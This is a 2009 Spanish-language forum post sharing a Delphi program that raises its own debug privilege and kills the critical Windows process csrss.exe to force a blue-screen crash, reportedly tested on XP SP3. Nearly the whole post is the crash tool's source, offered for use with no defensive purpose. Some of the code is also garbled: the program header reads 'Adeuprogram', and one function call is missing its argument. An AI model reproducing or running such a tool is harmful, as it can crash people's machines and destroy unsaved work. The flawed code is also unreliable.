(Delphi) Local BSOD - (Pantallazo Azul)
Publicado: 14 Jul 2009, 13:47
la tecnica consiste en matar el proceso critico de windows csrss.exe, para ello necesitamos elevar privilegios, codigos de delphi.about.com, provado en XP SP3, si alguien tiene el Vista...
Adeuprogram ChauWin;
uses Windows,
TlHelp32;
function GetProcessID(ProcessName: string): DWORD;
var
Handle: THandle;
Process: TProcessEntry32;
GotProcess: Boolean;
begin
Handle := CreateToolHelp32SnapShot(TH32CS_SNAPALL, 0);
Process.dwSize := SizeOf(Process);
GotProcess := Process32First(Handle, Process);
if GotProcess and (Process.szExeFile <> ProcessName) then
repeat
GotProcess := Process32Next(Handle, Process);
until (not GotProcess) or (Process.szExeFile = ProcessName);
if GotProcess then Result := Process.th32ProcessID
else Result := 0;
CloseHandle(Handle);
end;
function SetDebugPrivilege: Boolean;
var
hToken: THandle;
TP: TTokenPrivileges;
lpLuid: TLargeInteger;
dwReturnLength: DWORD;
begin
Result := False;
if OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken) then
begin
if LookupPrivilegeValue(nil, 'SeDebugPrivilege', lpLuid) then
begin
TP.PrivilegeCount := 1;
TP.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
TP.Privileges[0].Luid := lpLuid;
Result := AdjustTokenPrivileges(hToken, False, TP, sizeof(TP), nil, dwReturnLength);
end;
CloseHandle(hToken);
end;
end;
procedure CloseProcess(ProcessName: String);
var
hProcessID, ProcessHandle: DWORD;
begin
hProcessID := GetProcessID();
ProcessHandle := OpenProcess(PROCESS_TERMINATE, False, hProcessID);
TerminateProcess(ProcessHandle, 0);
CloseHandle(ProcessHandle);
end;
begin
if SetDebugPrivilege then CloseProcess('csrss.exe'); ;
end.